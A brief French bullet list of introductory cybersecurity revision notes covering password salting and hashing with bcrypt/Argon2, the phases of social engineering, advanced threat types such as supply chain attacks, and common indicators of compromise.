  • Mots de passe : le salt protege contre les rainbow tables, utiliser bcrypt/Argon2, un mot de passe de 12+ caracteres mixtes est quasi incassable
  • L'ingenierie sociale suit 4 phases : Research, Hook, Play, Exit
  • Menaces avancees : supply chain attacks (SolarWinds, Kaseya), watering hole, fileless malware
  • Les IoC incluent : hash de fichiers, IP, domaines, URLs, emails, regles YARA, cles de registre